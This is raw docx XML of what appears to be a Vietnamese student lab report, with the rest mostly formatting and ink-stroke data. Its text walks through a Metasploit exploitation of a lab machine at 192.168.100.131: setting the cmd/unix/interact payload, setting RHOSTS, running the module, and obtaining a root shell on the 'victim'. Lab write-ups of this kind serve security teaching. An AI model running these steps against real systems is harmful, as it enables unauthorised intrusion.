          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>set payload</w:t>
      </w:r>
      <w:r w:rsidR="00276E81" w:rsidRPr="000739B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0739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cmd/unix/interact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47616A8F" w14:textId="12996FC5" w:rsidR="00ED35A8" w:rsidRPr="000739B5" w:rsidRDefault="00FF54E6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361A6A5" wp14:editId="023AB8AD">
            <wp:extent cx="5731510" cy="1101090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="80802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2787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1C28" w14:textId="1861BFB5" w:rsidR="00FF54E6" w:rsidRPr="000739B5" w:rsidRDefault="00FF54E6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9042E95" wp14:editId="6760823A">
            <wp:extent cx="5731510" cy="404495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="214254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4274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27DB" w14:textId="626A8D62" w:rsidR="00E76448" w:rsidRPr="000739B5" w:rsidRDefault="00E76448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Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F40128" w14:textId="15515BE2" w:rsidR="00B52EEC" w:rsidRPr="000739B5" w:rsidRDefault="00B52EEC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D3E9FC0" wp14:editId="64EE1C5B">
            <wp:extent cx="5731510" cy="2540635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="165880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092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B646" w14:textId="6FE8585A" w:rsidR="005A2875" w:rsidRPr="000739B5" w:rsidRDefault="005A2875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0739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Set các tham số cho module</w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5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</w:p>
    <w:p w14:paraId="6CBBB9FE" w14:textId="536C16FA" w:rsidR="005A2875" w:rsidRPr="000739B5" w:rsidRDefault="00271910" w:rsidP="00271910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>set RHOSTS 192.168.</w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100.131</w:t>
      </w:r>
      <w:r w:rsidR="00875FD2" w:rsidRPr="000739B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875FD2" w:rsidRPr="000739B5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 w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> đặt giá trị cho tham số là địa chỉ ip của máy victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C76BC4E" w14:textId="648F434C" w:rsidR="00CC4489" w:rsidRPr="000739B5" w:rsidRDefault="00CC4489" w:rsidP="0027191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715B304" wp14:editId="17E40423">
            <wp:extent cx="5731510" cy="2526665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="123707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734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9746" w14:textId="77777777" w:rsidR="008A4832" w:rsidRPr="000739B5" w:rsidRDefault="004561F4" w:rsidP="00271910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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;Các lệnh đã sử dụng: run </w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5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 w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chạy module khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="000739B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0739B5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 w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> lấy về shell của máy victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F90EDF" w14:textId="645C254E" w:rsidR="00875FD2" w:rsidRPr="000739B5" w:rsidRDefault="00BD1DBF" w:rsidP="00271910">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000739B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287EB4F" wp14:editId="67967E91">
            <wp:extent cx="5731510" cy="1863725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="91374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4734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639D" w14:textId="2B2DC8DC" w:rsidR="004561F4" w:rsidRPr="000739B5" w:rsidRDefault="004561F4" w:rsidP="0027191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0739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả hậu khai thác </w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5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 w:rsidRPr="000739B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0739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>lấy về shell của máy victim với đặc quyền roo</w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004561F4" w:rsidRPr="000739B5" w:rsidSect="0025070A">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="993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765"/>
    <w:rsid w:val="00012150"/>
    <w:rsid w:val="00072DB6"/>
    <w:rsid w:val="000739B5"/>
    <w:rsid w:val="000D727E"/>
    <w:rsid w:val="001146D7"/>
    <w:rsid w:val="00117453"/>
    <w:rsid w:val="001A03E4"/>
    <w:rsid w:val="001E78A8"/>
    <w:rsid w:val="0025070A"/>
    <w:rsid w:val="00271910"/>
    <w:rsid w:val="00276E81"/>
    <w:rsid w:val="00336662"/>
    <w:rsid w:val="003715AF"/>
    <w:rsid w:val="003C0C3F"/>
    <w:rsid w:val="003F5B31"/>
    <w:rsid w:val="00405F4A"/>
    <w:rsid w:val="004561F4"/>
    <w:rsid w:val="004936E6"/>
    <w:rsid w:val="004E386E"/>
    <w:rsid w:val="00537A01"/>
    <w:rsid w:val="00581828"/>
    <w:rsid w:val="005A2875"/>
    <w:rsid w:val="00607471"/>
    <w:rsid w:val="00610635"/>
    <w:rsid w:val="00643D92"/>
    <w:rsid w:val="006B5058"/>
    <w:rsid w:val="006C308C"/>
    <w:rsid w:val="007345BC"/>
    <w:rsid w:val="007B55B5"/>
    <w:rsid w:val="007E3B26"/>
    <w:rsid w:val="00811B17"/>
    <w:rsid w:val="00875FD2"/>
    <w:rsid w:val="00895765"/>
    <w:rsid w:val="008A4832"/>
    <w:rsid w:val="008B6B66"/>
    <w:rsid w:val="00A36BA5"/>
    <w:rsid w:val="00A81B9F"/>
    <w:rsid w:val="00AB3A56"/>
    <w:rsid w:val="00B2194F"/>
    <w:rsid w:val="00B52EEC"/>
    <w:rsid w:val="00B62A88"/>
    <w:rsid w:val="00BA61C7"/>
    <w:rsid w:val="00BB6160"/>
    <w:rsid w:val="00BC4149"/>
    <w:rsid w:val="00BD1DBF"/>
    <w:rsid w:val="00C146CF"/>
    <w:rsid w:val="00CB6512"/>
    <w:rsid w:val="00CC4489"/>
    <w:rsid w:val="00D36D1E"/>
    <w:rsid w:val="00D66EB4"/>
    <w:rsid w:val="00DB7BD6"/>
    <w:rsid w:val="00DC4634"/>
    <w:rsid w:val="00DD49D8"/>
    <w:rsid w:val="00DE42ED"/>
    <w:rsid w:val="00E13122"/>
    <w:rsid w:val="00E23804"/>
    <w:rsid w:val="00E305BA"/>
    <w:rsid w:val="00E754B2"/>
    <w:rsid w:val="00E76448"/>
    <w:rsid w:val="00ED13CD"/>
    <w:rsid w:val="00ED35A8"/>
    <w:rsid w:val="00F35A07"/>
    <w:rsid w:val="00FF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3D67DC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F461F1E0-82DA-45A6-B27A-D7B9D5D3A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inhthng">
    <w:name w:val="Bình thường"/>
    <w:rsid w:val="00581828"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:firstLine="600"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="SimSun" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:kern w:val="0"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Phngmcinhcuaoanvn">
    <w:name w:val="Phông mặc định của đoạn văn"/>
    <w:rsid w:val="00581828"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005818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customXml" Target="ink/ink3.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink8.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18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customXml" Target="ink/ink4.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink2.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink5.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink7.xml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2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ink/ink1.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image190.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image210.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink6.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink9.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17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49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31T14:40:19.570"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.3" units="cm"/>
      <inkml:brushProperty name="ignorePressure" value="1"/>
      <inkml:brushProperty name="inkEffects" value="pencil"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 8,'0'-3,"0"-1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40:12.5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305 22 24575,'-36'-1'0,"0"-2"0,-37-7 0,60 7 0,0 1 0,-1 1 0,1 0 0,0 0 0,0 2 0,-1-1 0,1 2 0,-15 3 0,26-4 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,0 0 0,-1 0 0,1 4 0,1 53 0,0-41 0,0 41 0,-1-34 0,0 1 0,2 0 0,8 41 0,-5-45 0,-4-17 0,-1 0 0,1-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,1-1 0,4 4 0,-2-1 0,0-1 0,-1 1 0,1-2 0,0 1 0,0-1 0,1 0 0,-1 0 0,1-1 0,0 1 0,0-2 0,0 1 0,0-1 0,12 3 0,56 8 0,-38-6 0,1-1 0,60 2 0,-74-7 0,48 8 0,-27-2 0,2 0 0,-24-2 0,0-2 0,26 0 0,62-6 0,131 5 0,-179 7 0,-38-5 0,46 2 0,3-8 0,81 4 0,-103 6 0,-36-5 0,0 0 0,23 0 0,50-4 0,69 2 0,-105 8 0,-37-6 0,0 0 0,22 0 0,4-2 0,80 11 0,-78-7 0,0-2 0,75-5 0,-30 0 0,1145 2 0,-1217 1 0,-1 0 0,22 6 0,-22-4 0,1 0 0,20 0 0,4-3 0,-4-1 0,0 2 0,0 1 0,-1 2 0,59 14 0,-65-12 0,1-2 0,-1 0 0,1-2 0,0-2 0,37-3 0,11 1 0,18 0 0,105 5 0,-150 5 0,-36-5 0,1 0 0,21 0 0,933-3 0,-955-1 0,0-1 0,22-4 0,-21 2 0,-1 2 0,21-2 0,-11 3 0,34-7 0,-35 4 0,41-1 0,-41 4 0,37-7 0,-37 4 0,39 0 0,45 6 0,118-4 0,-175-7 0,-36 6 0,0 0 0,23 0 0,44 5 0,63-4 0,-93-6 0,-37 5 0,0 0 0,23 0 0,2 2 0,81-11 0,15-3 0,8-6 0,-87 12 0,0 2 0,69 1 0,-110 6 0,1-1 0,-1-1 0,1-1 0,-1 0 0,22-7 0,-33 8 0,0 0 0,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,-1-1 0,1 0 0,-1 0 0,0 0 0,0-1 0,3-6 0,-4 3 0,-1 0 0,1 0 0,-2 0 0,1 0 0,-1 0 0,-1 0 0,0 0 0,0-1 0,-1 1 0,0 0 0,0 0 0,-1 0 0,0 0 0,-1 0 0,0 0 0,0 1 0,-1 0 0,0-1 0,-1 1 0,0 0 0,-6-7 0,-17-18 0,21 23 0,-2 1 0,1-1 0,-1 2 0,0-1 0,-1 1 0,-18-12 0,-8-2 0,-26-14 0,43 27 0,11 5 0,1 1 0,-1-1 0,0 1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-16 0 0,-76-7 0,62 4 0,-37 1 0,-1072 5 0,1126 0 0,0 1 0,1 1 0,-31 9 0,30-7 0,0 0 0,0-1 0,-31 0 0,35-3 0,-1 1 0,-18 4 0,-34 3 0,-7-11 0,-58 4 0,83 6 0,36-5 0,-1 0 0,-21 0 0,-24-3 0,23-1 0,-1 2 0,-67 9 0,62-4 0,0-2 0,-1-2 0,-47-5 0,4 1 0,-651 2 0,723-1 0,1 0 0,-22-6 0,22 4 0,-1 0 0,-20 0 0,17 2 0,-38-8 0,13 1 0,-2 1 0,24 3 0,0 1 0,-25 0 0,13 2 0,1-1 0,-43-8 0,20 1 0,0 2 0,-72 0 0,-1951 10 197,1056-5-1759,1009 2-5264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30:59.7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1638 24 24575,'-1430'0'0,"1423"0"0,0 1 0,0 0 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 1 0,1 0 0,0 0 0,0 1 0,0 0 0,-7 5 0,6-3 0,-1-1 0,0-1 0,0 1 0,0-1 0,-1 0 0,-11 3 0,18-6 0,-1 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,1 0 0,-1-1 0,1 1 0,-2 5 0,2-6 0,0 1 0,0-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,1 1 0,-1-1 0,3 3 0,19 18 0,0-2 0,2-1 0,43 28 0,8-2 0,-68-40 0,0-2 0,0 1 0,0-1 0,1-1 0,-1 1 0,1-1 0,0-1 0,0 0 0,0 0 0,0 0 0,0-1 0,14-1 0,-11 1 0,42 7 0,17 1 0,-39-8 0,37 8 0,-12-1 0,-3-1 0,-32-3 0,43 2 0,-34-5 0,-1 1 0,38 7 0,-24-4 0,1-2 0,73-4 0,-29-2 0,7 5 0,107-4 0,-177-2 0,36-9 0,-42 7 0,1 2 0,0 0 0,23 0 0,-37 3 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1 0 0,0 0 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1-1 0,7-8 0,2-9 0,-13 20 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 1 0,5-4 0,-3 2 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,2-6 0,7-14 0,28-24 0,-34 37 0,-1 1 0,0-1 0,-1-1 0,0 1 0,-1 0 0,0-1 0,-1 1 0,0-1 0,-1 0 0,0 1 0,-3-18 0,3 27 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-2 0 0,-9-2 0,0 2 0,0 0 0,-22 2 0,11 0 0,-33-1 0,31-2 0,-1 2 0,1 0 0,-40 9 0,-39 8 0,58-12-1365,33-5-5461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31:18.2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1648 23 24575,'-42'0'0,"14"1"0,0-1 0,0-2 0,-49-8 0,45 5 0,0 1 0,0 2 0,-1 1 0,-36 4 0,-8-1 0,36-2 0,14-1 0,-1 1 0,0 1 0,-49 10 0,-64 7 0,36-1 0,85-13 0,1-2 0,-37 0 0,37-2 0,0 1 0,0 1 0,-24 5 0,-62 11 0,85-14 0,0-2 0,-36 0 0,36-2 0,0 1 0,1 1 0,-21 4 0,21-3 0,1 0 0,-1-2 0,-38-1 0,-16 1 0,71-1 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,-1 1 0,1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,1 1 0,0 0 0,-1 0 0,2 0 0,0 6 0,-1-6 0,0 1 0,1-1 0,0 1 0,0-1 0,0 0 0,1 1 0,0-1 0,-1 0 0,2 0 0,-1 0 0,0 0 0,1-1 0,-1 1 0,1 0 0,0-1 0,0 0 0,1 0 0,-1 0 0,6 4 0,133 44 0,-90-34 0,0-2 0,102 14 0,-107-21 0,-29-4 0,-1-1 0,25 0 0,382-4 0,-408 0 0,1 0 0,26-7 0,3-1 0,60-8 0,-58 9 0,-25 4 0,0 1 0,24 0 0,-30 4 0,0-1 0,0-1 0,0-1 0,0-1 0,0 0 0,-1-1 0,19-7 0,-17 4 0,0 0 0,0-2 0,21-13 0,-32 17 0,-1 0 0,1 0 0,-1-1 0,0 1 0,-1-1 0,0-1 0,0 1 0,0-1 0,-1 0 0,7-12 0,-9 14 0,0 0 0,1 0 0,-2 0 0,1-1 0,-1 1 0,1 0 0,-2-1 0,1 0 0,0 1 0,-1-10 0,-1 11 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-3-2 0,0 0 0,1 1 0,-1-1 0,1 1 0,-1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 1 0,0 0 0,0 0 0,0 0 0,1 1 0,-1 0 0,-14 0 0,9 0-341,0 0 0,1-1-1,-15-4 1,14 4-6485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31:25.8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2403 22 24575,'-41'-1'0,"1"-1"0,-43-9 0,38 6 0,0 3 0,-73 3 0,30 1 0,-706-2 0,778 1 0,0 1 0,-22 4 0,22-2 0,-1-2 0,-20 2 0,-33 4 0,-1 1 0,23-7 0,-63 9 0,78-8 0,0-1 0,-37-3 0,-41 1 0,59 9 0,36-6 0,-1 0 0,-21 0 0,11-3 0,7 0 0,-1 0 0,0 1 0,-39 8 0,19 0 0,31-8 0,1 1 0,-1 0 0,1 0 0,0 1 0,0 0 0,0 1 0,-9 5 0,13-6 0,0 1 0,0 0 0,0 0 0,1 0 0,0 1 0,0-1 0,0 1 0,0 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 0 0,0 0 0,0 0 0,0 1 0,1-1 0,0 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,1 0 0,-1 0 0,1-1 0,0 0 0,0 1 0,8 8 0,3 3 0,-1-1 0,14 24 0,-14-20 0,-2-4 0,0 1 0,29 29 0,-20-25 0,-15-15 0,1 0 0,-1-1 0,1 1 0,0-1 0,1 0 0,-1-1 0,1 1 0,11 4 0,5 2 0,-17-8 0,0 0 0,1 0 0,0 0 0,-1-1 0,1 0 0,0 0 0,0-1 0,8 1 0,11 1 0,1 1 0,40 11 0,-31-1 0,-31-11 0,1 0 0,0-1 0,0 0 0,0 0 0,0 0 0,1-1 0,6 1 0,29 0 0,-23-2 0,-1 1 0,34 7 0,-19-3 0,0-2 0,0 0 0,67-6 0,-23 1 0,-30 3 0,-18 0 0,1-1 0,0-1 0,52-10 0,-62 7 0,0 2 0,0 0 0,26 1 0,-26 1 0,1 0 0,-1-2 0,25-5 0,96-10 0,-118 13 0,0 1 0,0 2 0,0 0 0,25 3 0,-16-1 0,35-3 0,22-16 0,16 0 0,-82 15 0,1-1 0,-1-1 0,0-1 0,38-16 0,-50 19 0,0-1 0,0 1 0,0 1 0,20-2 0,12-3 0,-6 1 0,-28 5 0,-1 0 0,0 0 0,1-1 0,-1 0 0,0-1 0,0 0 0,11-5 0,2-3 0,2 1 0,38-11 0,-46 17 0,1-1 0,-1 0 0,-1-1 0,1 0 0,-1-1 0,0-1 0,-1 0 0,21-17 0,-20 11 0,-11 12 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,1 0 0,0-7 0,0-5 0,-1-1 0,0 1 0,-1-1 0,-1 0 0,-4-17 0,5 28 0,0 0 0,0 1 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,-5-2 0,-2-1 0,0 0 0,0 0 0,-16-12 0,20 12 0,-1 0 0,0 0 0,0 1 0,-1 0 0,1 0 0,-1 1 0,-16-4 0,-42 3-1365,52 5-5461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31T14:31:43.385"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.3" units="cm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31:40.1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31:36.6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39:51.6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24575,'-1'0'-8191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14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Kiên Hoàng Trung</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kiên Hoàng Trung</cp:lastModifiedBy>
  <cp:revision>61</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-31T12:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-31T15:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>